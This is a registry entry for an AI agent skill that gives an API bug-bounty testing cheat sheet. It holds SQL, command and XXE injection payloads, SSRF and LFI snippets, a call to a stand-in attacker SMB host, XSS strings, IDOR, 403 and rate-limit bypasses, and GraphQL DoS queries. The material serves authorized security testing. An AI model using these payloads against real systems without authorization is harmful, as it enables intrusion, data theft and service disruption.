{"id":"67edb2bf-d737-4173-bbfd-fa5dfdc8083e","shortId":"8N3vFS","kind":"skill","title":"api-fuzzing-bug-bounty","tagline":"Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# API Fuzzing for Bug Bounty\n\n## Purpose\n\nProvide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.\n\n## Inputs/Prerequisites\n\n- Burp Suite or similar proxy tool\n- API wordlists (SecLists, api_wordlist)\n- Understanding of REST/GraphQL/SOAP protocols\n- Python for scripting\n- Target API endpoints and documentation (if available)\n\n## Outputs/Deliverables\n\n- Identified API vulnerabilities\n- IDOR exploitation proofs\n- Authentication bypass techniques\n- SQL injection points\n- Unauthorized data access documentation\n\n---\n\n## API Types Overview\n\n| Type | Protocol | Data Format | Structure |\n|------|----------|-------------|-----------|\n| SOAP | HTTP | XML | Header + Body |\n| REST | HTTP | JSON/XML/URL | Defined endpoints |\n| GraphQL | HTTP | Custom Query | Single endpoint |\n\n---\n\n## Core Workflow\n\n### Step 1: API Reconnaissance\n\nIdentify API type and enumerate endpoints:\n\n```bash\n# Check for Swagger/OpenAPI documentation\n/swagger.json\n/openapi.json\n/api-docs\n/v1/api-docs\n/swagger-ui.html\n\n# Use Kiterunner for API discovery\nkr scan https://target.com -w routes-large.kite\n\n# Extract paths from Swagger\npython3 json2paths.py swagger.json\n```\n\n### Step 2: Authentication Testing\n\n```bash\n# Test different login paths\n/api/mobile/login\n/api/v3/login\n/api/magic_link\n/api/admin/login\n\n# Check rate limiting on auth endpoints\n# If no rate limit → brute force possible\n\n# Test mobile vs web API separately\n# Don't assume same security controls\n```\n\n### Step 3: IDOR Testing\n\nInsecure Direct Object Reference is the most common API vulnerability:\n\n```bash\n# Basic IDOR\nGET /api/users/1234 → GET /api/users/1235\n\n# Even if ID is email-based, try numeric\n/?user_id=111 instead of /?user_id=user@mail.com\n\n# Test /me/orders vs /user/654321/orders\n```\n\n**IDOR Bypass Techniques:**\n\n```bash\n# Wrap ID in array\n{\"id\":111} → {\"id\":[111]}\n\n# JSON wrap\n{\"id\":111} → {\"id\":{\"id\":111}}\n\n# Send ID twice\nURL?id=<LEGIT>&id=<VICTIM>\n\n# Wildcard injection\n{\"user_id\":\"*\"}\n\n# Parameter pollution\n/api/get_profile?user_id=<victim>&user_id=<legit>\n{\"user_id\":<legit_id>,\"user_id\":<victim_id>}\n```\n\n### Step 4: Injection Testing\n\n**SQL Injection in JSON:**\n\n```json\n{\"id\":\"56456\"}                    → OK\n{\"id\":\"56456 AND 1=1#\"}           → OK  \n{\"id\":\"56456 AND 1=2#\"}           → OK\n{\"id\":\"56456 AND 1=3#\"}           → ERROR (vulnerable!)\n{\"id\":\"56456 AND sleep(15)#\"}     → SLEEP 15 SEC\n```\n\n**Command Injection:**\n\n```bash\n# Ruby on Rails\n?url=Kernel#open → ?url=|ls\n\n# Linux command injection\napi.url.com/endpoint?name=file.txt;ls%20/\n```\n\n**XXE Injection:**\n\n```xml\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n```\n\n**SSRF via API:**\n\n```html\n<object data=\"http://127.0.0.1:8443\"/>\n<img src=\"http://127.0.0.1:445\"/>\n```\n\n**.NET Path.Combine Vulnerability:**\n\n```bash\n# If .NET app uses Path.Combine(path_1, path_2)\n# Test for path traversal\nhttps://example.org/download?filename=a.png\nhttps://example.org/download?filename=C:\\inetpub\\wwwroot\\web.config\nhttps://example.org/download?filename=\\\\smb.dns.attacker.com\\a.png\n```\n\n### Step 5: Method Testing\n\n```bash\n# Test all HTTP methods\nGET /api/v1/users/1\nPOST /api/v1/users/1\nPUT /api/v1/users/1\nDELETE /api/v1/users/1\nPATCH /api/v1/users/1\n\n# Switch content type\nContent-Type: application/json → application/xml\n```\n\n---\n\n## GraphQL-Specific Testing\n\n### Introspection Query\n\nFetch entire backend schema:\n\n```graphql\n{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}\n```\n\n**URL-encoded version:**\n\n```\n/graphql?query={__schema{types{name,kind,description,fields{name}}}}\n```\n\n### GraphQL IDOR\n\n```graphql\n# Try accessing other user IDs\nquery {\n  user(id: \"OTHER_USER_ID\") {\n    email\n    password\n    creditCard\n  }\n}\n```\n\n### GraphQL SQL/NoSQL Injection\n\n```graphql\nmutation {\n  login(input: {\n    email: \"test' or 1=1--\"\n    password: \"password\"\n  }) {\n    success\n    jwt\n  }\n}\n```\n\n### Rate Limit Bypass (Batching)\n\n```graphql\nmutation {login(input:{email:\"a@example.com\" password:\"password\"}){success jwt}}\nmutation {login(input:{email:\"b@example.com\" password:\"password\"}){success jwt}}\nmutation {login(input:{email:\"c@example.com\" password:\"password\"}){success jwt}}\n```\n\n### GraphQL DoS (Nested Queries)\n\n```graphql\nquery {\n  posts {\n    comments {\n      user {\n        posts {\n          comments {\n            user {\n              posts { ... }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n### GraphQL XSS\n\n```bash\n# XSS via GraphQL endpoint\nhttp://target.com/graphql?query={user(name:\"<script>alert(1)</script>\"){id}}\n\n# URL-encoded XSS\nhttp://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E\n```\n\n### GraphQL Tools\n\n| Tool | Purpose |\n|------|---------|\n| GraphCrawler | Schema discovery |\n| graphw00f | Fingerprinting |\n| clairvoyance | Schema reconstruction |\n| InQL | Burp extension |\n| GraphQLmap | Exploitation |\n\n---\n\n## Endpoint Bypass Techniques\n\nWhen receiving 403/401, try these bypasses:\n\n```bash\n# Original blocked request\n/api/v1/users/sensitivedata → 403\n\n# Bypass attempts\n/api/v1/users/sensitivedata.json\n/api/v1/users/sensitivedata?\n/api/v1/users/sensitivedata/\n/api/v1/users/sensitivedata??\n/api/v1/users/sensitivedata%20\n/api/v1/users/sensitivedata%09\n/api/v1/users/sensitivedata#\n/api/v1/users/sensitivedata&details\n/api/v1/users/..;/sensitivedata\n```\n\n---\n\n## Output Exploitation\n\n### PDF Export Attacks\n\n```html\n<!-- LFI via PDF export -->\n<iframe src=\"file:///etc/passwd\" height=1000 width=800>\n\n<!-- SSRF via PDF export -->\n<object data=\"http://127.0.0.1:8443\"/>\n\n<!-- Port scanning -->\n<img src=\"http://127.0.0.1:445\"/>\n\n<!-- IP disclosure -->\n<img src=\"https://iplogger.com/yourcode.gif\"/>\n```\n\n### DoS via Limits\n\n```bash\n# Normal request\n/api/news?limit=100\n\n# DoS attempt\n/api/news?limit=9999999999\n```\n\n---\n\n## Common API Vulnerabilities Checklist\n\n| Vulnerability | Description |\n|---------------|-------------|\n| API Exposure | Unprotected endpoints exposed publicly |\n| Misconfigured Caching | Sensitive data cached incorrectly |\n| Exposed Tokens | API keys/tokens in responses or URLs |\n| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |\n| IDOR / BOLA | Broken Object Level Authorization |\n| Undocumented Endpoints | Hidden admin/debug endpoints |\n| Different Versions | Security gaps in older API versions |\n| Rate Limiting | Missing or bypassable rate limits |\n| Race Conditions | TOCTOU vulnerabilities |\n| XXE Injection | XML parser exploitation |\n| Content Type Issues | Switching between JSON/XML |\n| HTTP Method Tampering | GET→DELETE/PUT abuse |\n\n---\n\n## Quick Reference\n\n| Vulnerability | Test Payload | Risk |\n|---------------|--------------|------|\n| IDOR | Change user_id parameter | High |\n| SQLi | `' OR 1=1--` in JSON | Critical |\n| Command Injection | `; ls /` | Critical |\n| XXE | DOCTYPE with ENTITY | High |\n| SSRF | Internal IP in params | High |\n| Rate Limit Bypass | Batch requests | Medium |\n| Method Tampering | GET→DELETE | High |\n\n---\n\n## Tools Reference\n\n| Category | Tool | URL |\n|----------|------|-----|\n| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |\n| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |\n| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |\n| API Security | apicheck | github.com/BBVA/apicheck |\n| API Discovery | Kiterunner | github.com/assetnote/kiterunner |\n| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |\n| API Toolkit | APIKit | github.com/API-Security/APIKit |\n| API Keys | API Guesser | api-guesser.netlify.app |\n| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |\n| GraphQL | InQL | github.com/doyensec/inql |\n| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |\n| GraphQL | graphw00f | github.com/dolevf/graphw00f |\n| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |\n| GraphQL | batchql | github.com/assetnote/batchql |\n| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |\n| Wordlists | SecLists | github.com/danielmiessler/SecLists |\n| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |\n| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |\n| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |\n| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |\n\n---\n\n## Constraints\n\n**Must:**\n- Test mobile, web, and developer APIs separately\n- Check all API versions (/v1, /v2, /v3)\n- Validate both authenticated and unauthenticated access\n\n**Must Not:**\n- Assume same security controls across API versions\n- Skip testing undocumented endpoints\n- Ignore rate limiting checks\n\n**Should:**\n- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend\n- Check archive.org for historical API endpoints\n- Test for race conditions on sensitive operations\n\n---\n\n## Examples\n\n### Example 1: IDOR Exploitation\n\n```bash\n# Original request (own data)\nGET /api/v1/invoices/12345\nAuthorization: Bearer <token>\n\n# Modified request (other user's data)\nGET /api/v1/invoices/12346\nAuthorization: Bearer <token>\n\n# Response reveals other user's invoice data\n```\n\n### Example 2: GraphQL Introspection\n\n```bash\ncurl -X POST https://target.com/graphql \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"query\":\"{__schema{types{name,fields{name}}}}\"}'\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |\n| 401 on all endpoints | Try adding `?user_id=1` parameter |\n| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |\n| Rate limited | Use IP rotation or batch requests |\n| Can't find endpoints | Check Swagger, archive.org, JS files |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["api","fuzzing","bug","bounty","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents"],"capabilities":["skill","source-sickn33","skill-api-fuzzing-bug-bounty","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/api-fuzzing-bug-bounty","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34964 github stars · SKILL.md body (10,153 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-25T00:50:26.873Z","embedding":null,"createdAt":"2026-04-18T21:31:08.690Z","updatedAt":"2026-04-25T00:50:26.873Z","lastSeenAt":"2026-04-25T00:50:26.873Z","tsv":"'/amalmurali47/swagroutes':889 '/api-docs':177 '/api-security/apikit':827 '/api/admin/login':209 '/api/get_profile':308 '/api/magic_link':208 '/api/mobile/login':206 '/api/news':643,648 '/api/users/1234':253 '/api/users/1235':255 '/api/v1/invoices/12345':976 '/api/v1/invoices/12346':986 '/api/v1/users':629 '/api/v1/users/1':427,429,431,433,435 '/api/v1/users/sensitivedata':614,619,620,621,622,624,626,627 '/api/v1/users/sensitivedata.json':618 '/api/v3/login':207 '/assetnote/batchql':863 '/assetnote/kiterunner':813 '/bbva/apicheck':807 '/danaepp/8c6803e542f094da5c4079622f9b4d18':838 '/danielmiessler/seclists':875 '/dolevf/graphql-cop':870 '/dolevf/graphw00f':853 '/download?filename=':414 '/download?filename=a.png':405 '/download?filename=c:':408 '/doyensec/inql':843 '/endpoint?name=file.txt;ls%20/':372 '/etc/passwd':381 '/example?id=%c/script%e%cscript%ealert(''xss'')%c/script%e':583 '/flipkart-incubator/astra':801 '/fuzzapi/api-fuzzer':795 '/fuzzapi/fuzzapi':787 '/graphql':477,1006 '/graphql?query=':573 '/gsmith257-cyber/graphcrawler':848 '/me/orders':274 '/mindapi/play':895 '/ngalongc/openapi_security_scanner':821 '/nikitastupin/clairvoyance':858 '/openapi.json':176 '/s0md3v/dump/tree/master/json2paths':901 '/sensitivedata':630 '/swagger-ez':883 '/swagger-ui.html':179 '/swagger.json':175 '/user/654321/orders':276 '/v1':915 '/v1/api-docs':178 '/v2':916 '/v3':917 '09':625 '1':161,332,333,338,344,396,513,514,746,747,967,1040 '100':645 '111':267,286,288,292,295 '15':352,354 '2':198,339,398,997 '20':623 '3':236,345 '4':318 '401':1032 '403':615 '403/401':606 '5':418 '56456':327,330,336,342,349 '9999999999':650 'a.png':416 'a@example.com':528 'abus':731 'access':132,490,923 'across':930 'action':1079 'ad':1037 'add':942,1025 'admin/debug':694 'algorithm':683 'api':2,15,33,54,69,87,98,101,111,119,134,162,165,183,227,247,384,652,657,671,702,782,788,791,796,802,808,814,822,828,830,890,909,913,931,956,1022 'api-fuzz':790 'api-fuzzing-bug-bounti':1 'api-guesser.netlify.app':832 'api-specif':32,86 'api.url.com':371 'api.url.com/endpoint?name=file.txt;ls%20/':370 'apicheck':804 'apikit':824 'app':392 'applic':1073 'application/json':442,1011 'application/xml':443 'archive.org':953,1064 'arg':468 'array':284 'assess':47 'assum':231,926 'astra':798 'attack':35,89,635 'attempt':617,647 'auth':214 'authent':27,81,124,199,920 'author':37,45,690,977,987 'avail':116 'b@example.com':537 'backend':452 'base':262 'bash':170,201,249,280,358,389,421,566,610,640,970,1000 'basic':250 'batch':522,769,1056 'batchql':860 'bearer':978,988 'block':612 'bodi':146 'bola':686 'bounti':5,18,58,72 'broken':687 'brute':220 'bug':4,17,57,71 'burp':92,597 'bypass':28,82,125,278,521,602,609,616,708,768 'c@example.com':546 'cach':664,667 'categori':779 'chang':739 'check':171,210,911,940,952,1062 'checklist':654 'clairvoy':593,855,1046 'command':356,368,751 'comment':558,561 'common':246,651 'comprehens':7,61 'condit':712,961 'confus':684 'constraint':902 'content':437,440,720,1009 'content-typ':439,1008 'control':51,234,929 'cop':867 'core':158 'cover':24,78 'creditcard':502 'critic':750,754 'curl':1001 'custom':154 'd':1012 'data':131,139,666,974,984,995 'defens':48 'defin':150 'delet':432,775 'delete/put':730 'describ':1080 'descript':463,483,656 'detail':628 'develop':908 'differ':203,696 'direct':240 'disabl':1044 'discoveri':26,80,184,590,809,815 'doctyp':376,756 'document':114,133,174 'dos':552,637,646 'dsopas.github.io':894 'dsopas.github.io/mindapi/play':893 'educ':52 'email':261,500,510,527,536,545 'email-bas':260 'encod':475,579 'endpoint':112,151,157,169,215,570,601,660,692,695,936,957,1035,1061 'engag':23,77 'entir':451 'entiti':378,758 'enumer':168 'environ':53 'error':346 'even':256 'exampl':965,966,996 'example.org':404,407,413 'example.org/download?filename=':412 'example.org/download?filename=a.png':403 'example.org/download?filename=c:':406 'execut':1075 'expir':682 'exploit':30,84,122,600,632,719,969 'export':634 'expos':661,669 'exposur':658 'extens':598 'extract':190 'ez':880 'fetch':450 'field':464,484,1017 'file':1066 'find':1060 'fingerprint':592 'forc':221 'format':140 'frontend':951 'fuzz':3,55,783,789,797 'fuzzapi':784 'fuzzer':792 'gap':699 'get':252,254,426,729,774,975,985 'gist.github.com':837 'gist.github.com/danaepp/8c6803e542f094da5c4079622f9b4d18':836 'github.com':786,794,800,806,812,820,826,842,847,852,857,862,869,874,888,900 'github.com/amalmurali47/swagroutes':887 'github.com/api-security/apikit':825 'github.com/assetnote/batchql':861 'github.com/assetnote/kiterunner':811 'github.com/bbva/apicheck':805 'github.com/danielmiessler/seclists':873 'github.com/dolevf/graphql-cop':868 'github.com/dolevf/graphw00f':851 'github.com/doyensec/inql':841 'github.com/flipkart-incubator/astra':799 'github.com/fuzzapi/api-fuzzer':793 'github.com/fuzzapi/fuzzapi':785 'github.com/gsmith257-cyber/graphcrawler':846 'github.com/ngalongc/openapi_security_scanner':819 'github.com/nikitastupin/clairvoyance':856 'github.com/s0md3v/dump/tree/master/json2paths':899 'graphcrawl':588,845 'graphql':14,68,152,445,454,486,488,503,506,523,551,555,564,569,584,839,844,849,854,859,864,866,998,1042 'graphql-cop':865 'graphql-specif':444 'graphqlmap':599 'graphw00f':591,850 'guesser':831,835 'guid':833,834 'h':1007 'header':145,948,1031 'hidden':693 'high':743,759,765,776 'histor':955 'html':385,636 'http':143,148,153,424,726 'hunt':19,73 'id':258,266,271,282,285,287,291,293,294,297,300,301,305,310,312,314,316,326,329,335,341,348,493,496,499,576,741,1039 'identifi':118,164 'idor':29,83,121,237,251,277,487,685,738,968 'ignor':937 'includedeprec':465 'incorrect':668 'inetpub':409 'inject':128,303,319,322,357,369,374,505,716,752 'input':509,526,535,544 'inputs/prerequisites':91 'inql':596,840 'insecur':239 'instead':268 'intern':761 'introspect':448,999,1043 'invoic':994 'ip':762,1053 'issu':722,1020 'js':1065 'json':289,324,325,749,896 'json/xml':725 'json/xml/url':149 'json2paths':898 'json2paths.py':195 'jwt':518,532,541,550,677 'kernel':363 'key':829 'keys/tokens':672 'kind':461,472,482 'kiterunn':181,810 'kr':185 'level':689 'limit':212,219,520,639,644,649,705,710,767,939,1051 'linux':367 'login':204,508,525,534,543 'ls':366,753 'medium':771 'method':419,425,727,772 'mindapi':892 'mindmap':891 'misconfigur':663 'miss':706 'mobil':224,905 'modifi':979 'must':903,924 'mutat':507,524,533,542 'mutationtyp':458 'name':457,459,462,467,469,471,481,485,575,1016,1018 'nest':553 'net':386,391 'normal':641 'noth':1024 'numer':264 'object':241,688 'ok':328,334,340 'older':701 'open':364 'openapi':816 'oper':964 'origin':611,971 'output':631 'outputs/deliverables':117 'overview':136,1083 'param':764 'paramet':306,742,1041 'parser':718,877 'password':501,515,516,529,530,538,539,547,548 'patch':434 'path':191,205,395,397,401,897 'path.combine':387,394 'payload':736 'pdf':633 'penetr':21,75 'point':129 'pollut':307 'possibl':222 'post':428,557,560,563,1003 'proof':123 'protocol':106,138 'provid':6,60 'proxi':96 'public':662 'purpos':59,587 'put':430 'python':107 'python3':194 'queri':155,449,478,494,554,556,1013 'querytyp':456 'quick':732 'race':711,960 'rail':361 'rate':211,218,519,704,709,766,938,1050 'receiv':605 'reconnaiss':163 'reconstruct':595,1049 'refer':242,733,778 'request':613,642,770,945,972,980,1028,1057 'respons':674,989 'rest':11,65,147 'rest/graphql/soap':105 'return':1023 'reveal':990 'rhinosecuritylabs.github.io':882 'rhinosecuritylabs.github.io/swagger-ez':881 'risk':737 'rotat':1054 'rout':885 'routes-large.kite':189 'rubi':359 'scan':186 'scanner':818 'schema':453,455,479,589,594,1014,1048 'script':109 'sec':355 'seclist':100,872 'secur':46,233,698,803,817,928 'send':296 'sensit':665,963 'separ':228,910 'sign':680 'similar':95 'simul':950 'singl':156 'skill':42,1071 'skill-api-fuzzing-bug-bounty' 'skip':933 'sleep':351,353 'smb.dns.attacker.com':415 'soap':12,66,142 'solut':1021 'source-sickn33' 'specif':34,88,446 'sql':127,321 'sql/nosql':504 'sqli':744 'ssrf':382,760 'step':160,197,235,317,417 'structur':141 'success':517,531,540,549 'suit':93 'swagger':193,876,879,884,1063 'swagger-ez':878 'swagger.json':196 'swagger/openapi':173 'swagrout':886 'switch':436,723 'system':380 'tamper':728,773 'target':110 'target.com':187,572,582,1005 'target.com/example?id=%c/script%e%cscript%ealert(''xss'')%c/script%e':581 'target.com/graphql':1004 'target.com/graphql?query=':571 'techniqu':8,62,126,279,603 'test':10,22,64,76,200,202,223,238,273,320,377,399,420,422,447,511,735,904,934,958 'toctou':713 'token':670 'tool':97,585,586,777,780 'toolkit':823 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'travers':402 'tri':263,489,607,1036 'troubleshoot':1019 'true':466 'twice':298 'type':135,137,166,438,441,460,470,480,721,1010,1015 'unauthent':922 'unauthor':130 'understand':103 'undocu':691,935 'unprotect':659 'url':299,362,365,474,578,676,781 'url-encod':473,577 'use':38,40,180,393,1045,1052,1069 'user':265,270,304,309,311,313,315,492,495,498,559,562,574,740,982,992,1038 'user@mail.com':272 'valid':49,918 'vector':36,90 'version':476,697,703,914,932 'via':383,568,638 'vs':225,275 'vulner':25,79,120,248,347,388,653,655,714,734 'w':188 'weak':678,679 'web':226,906 'web.config':411 'wildcard':302 'wordlist':99,102,871 'workflow':159,1077 'wrap':281,290 'wwwroot':410 'x':944,1002,1027 'x-requested-with':943,1026 'xml':144,375,717 'xmlhttprequest':947,1030 'xss':565,567,580 'xxe':373,379,715,755","prices":[{"id":"98acf2a1-e1f4-4cbc-8fed-d2585bffb09f","listingId":"67edb2bf-d737-4173-bbfd-fa5dfdc8083e","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:31:08.690Z"}],"sources":[{"listingId":"67edb2bf-d737-4173-bbfd-fa5dfdc8083e","source":"github","sourceId":"sickn33/antigravity-awesome-skills/api-fuzzing-bug-bounty","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/api-fuzzing-bug-bounty","isPrimary":false,"firstSeenAt":"2026-04-18T21:31:08.690Z","lastSeenAt":"2026-04-25T00:50:26.873Z"}],"details":{"listingId":"67edb2bf-d737-4173-bbfd-fa5dfdc8083e","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"api-fuzzing-bug-bounty","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34964,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-24T06:41:17Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"3905b5eb4e6f808c60347784c4e2575aea256855","skill_md_path":"skills/api-fuzzing-bug-bounty/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/api-fuzzing-bug-bounty"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"api-fuzzing-bug-bounty","description":"Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/api-fuzzing-bug-bounty"},"updatedAt":"2026-04-25T00:50:26.873Z"}}